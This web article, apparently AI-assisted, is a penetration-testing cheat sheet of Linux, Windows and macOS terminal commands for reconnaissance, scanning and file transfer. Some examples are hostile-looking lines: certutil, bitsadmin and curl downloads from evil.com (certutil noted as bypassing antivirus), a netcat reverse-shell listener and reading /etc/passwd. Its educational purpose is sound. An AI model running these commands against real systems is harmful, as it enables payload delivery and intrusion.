Hacker Terminal Cheat Sheet: Essential Commands for Ethical Hacking
The command line interface (CLI) is the fundamental tool in the arsenal of any cybersecurity professional, ethical hacker, or penetration tester. While powerful graphical tools exist, understanding and mastering the terminal allows for greater flexibility, automation, and a deeper understanding of system interactions.
This cheat sheet provides a quick reference to essential commands across different operating systems, categorized by their typical use in a penetration testing lifecycle. Please note: This guide is intended for educational purposes only, for use in authorized penetration testing, security auditing, and learning environments. Misuse of these commands against systems without explicit permission is illegal and unethical.
Linux (Kali Linux, Ubuntu, etc.)
Linux distributions like Kali Linux are the go-to for most cybersecurity professionals due to their robust toolsets and open-source nature.
I. Information Gathering & Reconnaissance
| Command | Description | Example Usage |
|---|---|---|
whoami | Displays the current effective username. | whoami |
uname -a | Shows detailed Linux kernel information (OS, hostname, kernel). | uname -a |
ls / ls -la | List directory contents (-a for hidden, -l for details). | ls -la /home/user/ |
pwd | Print working directory (shows current location). | pwd |
cat <file> | Displays the content of a file. | cat /etc/passwd |
grep <pattern> <file> | Searches for patterns in files. | grep "admin" /var/log/auth.log |
find <path> -name <name> | Searches for files and directories. | find / -name "config.php" |
history | Shows command history of the current user. | history |
ps aux | Displays all running processes on the system. | ps aux |
crontab -l | Lists scheduled cron jobs for the current user. | crontab -l |
df -h | Reports file system disk space usage (-h for human-readable). | df -h |
II. Network Scanning & Analysis
| Command | Description | Example Usage |
|---|---|---|
ping <target> | Tests connectivity to a host. | ping google.com |
ip a / ifconfig | Displays network interface configuration (IP addresses, etc.). | ip a |
netstat -tulnp | Lists listening TCP/UDP ports and associated processes. | netstat -tulnp |
traceroute <target> | Traces the route packets take to a host. | traceroute 8.8.8.8 |
dig <domain> A | DNS lookup for A (address) records. | dig example.com A |
nmap -sS <target> | Stealth (SYN) port scan. | nmap -sS 192.168.1.1 |
nmap -sV <target> | Service version detection scan. | nmap -sV 192.168.1.1 |
nmap -O <target> | OS detection scan. | nmap -O 192.168.1.1 |
nmap -p- <target> | Scans all 65535 ports. | nmap -p- 192.168.1.1 |
nmap -A <target> | Aggressive scan (OS, service, script, traceroute). | nmap -A 192.168.1.1 |
nc -lvnp <port> | Netcat listener (simple listener for reverse shells). | nc -lvnp 4444 |
nc <target> <port> | Netcat client (connects to a port). | nc 192.168.1.10 80 |
III. File Transfer & Management
| Command | Description | Example Usage |
|---|---|---|
wget <URL> | Downloads files from the web. | wget http://example.com/malware |
curl <URL> | Transfers data from or to a server. | curl -O http://example.com/file.txt |
scp <source> <destination> | Securely copies files between hosts. | scp user@remote:/path/file . |
python3 -m http.server | Starts a simple Python HTTP server for file transfer. | python3 -m http.server 8000 |
Windows (Command Prompt / PowerShell)
Windows commands are crucial for enumerating targets and often for post-exploitation activities. PowerShell is increasingly powerful.
I. Information Gathering & Reconnaissance
| Command | Description | Example Usage |
|---|---|---|
whoami | Displays current user information. | whoami |
systeminfo | Shows detailed system configuration information. | systeminfo |
ver | Displays the Windows version. | ver |
dir | Lists directory contents. | dir C:\Users\Public |
type <file> | Displays the content of a text file. | type C:\Windows\system.ini |
tasklist | Lists all running processes. | tasklist /svc |
net user | Lists local user accounts. | net user |
net localgroup | Lists local groups and their members. | net localgroup administrators |
schtasks /query /fo LIST /v | Displays scheduled tasks. | schtasks /query /fo LIST /v |
driverquery | Lists installed device drivers. | driverquery |
wmic qfe get Caption,HotFixID,InstalledOn | Lists installed hotfixes (patches). | wmic qfe get Caption,HotFixID,InstalledOn |
II. Network Scanning & Analysis
| Command | Description | Example Usage |
|---|---|---|
ping <target> | Tests network connectivity. | ping 192.168.1.1 |
ipconfig /all | Displays full TCP/IP configuration. | ipconfig /all |
netstat -ano | Displays active network connections, listening ports, PID. | netstat -ano |
tracert <target> | Traces the route to a destination. | tracert google.com |
nslookup <domain> | Queries DNS servers for domain name information. | nslookup example.com |
net view | Displays network resources (computers, shares). | net view |
net use | Manages network connections to shared resources. | net use \\192.168.1.1\share |
netsh firewall show state | Shows Windows Firewall status. | netsh firewall show state |
Get-NetIPConfiguration (PS) | (PowerShell) Displays network configuration. | Get-NetIPConfiguration |
Test-NetConnection (PS) | (PowerShell) Tests network connectivity and port reachability. | Test-NetConnection -ComputerName google.com -Port 443 |
III. File Transfer & Management
| Command | Description | Example Usage |
|---|---|---|
certutil.exe -urlcache -f <URL> <outfile> | Downloads a file using certutil.exe (often bypasses AV). | certutil.exe -urlcache -f http://evil.com/mal.exe mal.exe |
bitsadmin /transfer <job_name> <URL> <outfile> | Downloads files using BITSAdmin (background intelligent transfer service). | bitsadmin /transfer mydownload http://evil.com/file.txt C:\file.txt |
copy <source> <destination> | Copies files. | copy C:\temp\exploit.exe \\share\exploit.exe |
macOS (Terminal)
macOS, being Unix-based, shares many commands with Linux, but also has its own unique utilities.
I. Information Gathering & Reconnaissance
| Command | Description | Example Usage |
|---|---|---|
whoami | Displays the current effective username. | whoami |
sw_vers | Shows macOS version information. | sw_vers |
sysctl -n kern.version | Displays kernel version. | sysctl -n kern.version |
ls / ls -la | List directory contents (-a for hidden, -l for details). | ls -la /Users/Shared |
pwd | Print working directory (shows current location). | pwd |
cat <file> | Displays the content of a file. | cat /etc/hosts |
grep <pattern> <file> | Searches for patterns in files. | grep "admin" /var/log/system.log |
find <path> -name <name> | Searches for files and directories. | find /Users -name "*.kext" |
ps aux | Displays all running processes on the system. | ps aux |
launchctl list | Lists loaded launchd jobs (services, agents). | launchctl list |
df -h | Reports file system disk space usage (-h for human-readable). | df -h |
II. Network Scanning & Analysis
| Command | Description | Example Usage |
|---|---|---|
ping <target> | Tests connectivity to a host. | ping 192.168.1.1 |
ifconfig | Displays network interface configuration (IP addresses, etc.). | ifconfig en0 |
netstat -an | Lists active network connections and listening ports. | netstat -an |
traceroute <target> | Traces the route packets take to a host. | traceroute 8.8.8.8 |
dig <domain> A | DNS lookup for A (address) records. | dig example.com A |
/usr/sbin/networksetup -listallnetworkservices | Lists all network services. | /usr/sbin/networksetup -listallnetworkservices |
/usr/sbin/networksetup -getinfo "Wi-Fi" | Gets detailed information for a specific network service. | /usr/sbin/networksetup -getinfo "Wi-Fi" |
lsof -i | Lists open files and network connections. | sudo lsof -i :80 |
/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s | Scans for available Wi-Fi networks. | /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s |
III. File Transfer & Management
| Command | Description | Example Usage |
|---|---|---|
curl <URL> | Transfers data from or to a server. | curl -O http://evil.com/file.txt |
wget <URL> | Downloads files from the web (may need to be installed via Homebrew). | wget http://example.com/malware |
scp <source> <destination> | Securely copies files between hosts. | scp user@remote:/path/file . |
Important Ethical Hacking Principles:
- Always Get Permission: Never use these commands on systems or networks you do not own or have explicit written permission to test. Unauthorized access is illegal.
- Scope Definition: Clearly define the scope of your penetration test before you begin.
- Documentation: Document every command, every finding, and every step of your process.
- Legal & Ethical Boundaries: Operate strictly within legal and ethical boundaries.
- Knowledge is Power (and Responsibility): Understand the impact of each command before you execute it.
This cheat sheet serves as a starting point. The world of ethical hacking is vast and constantly evolving. Continuous learning, practice in controlled environments, and a strong ethical compass are the true keys to becoming a proficient and responsible cybersecurity professional.
***
Note on Content Creation: This article was developed with the assistance of generative AI like Gemini or ChatGPT. While all public AI strives for accuracy and comprehensive coverage, all content is reviewed and edited by human experts at IsoSecu to ensure factual correctness, relevance, and adherence to our editorial standards.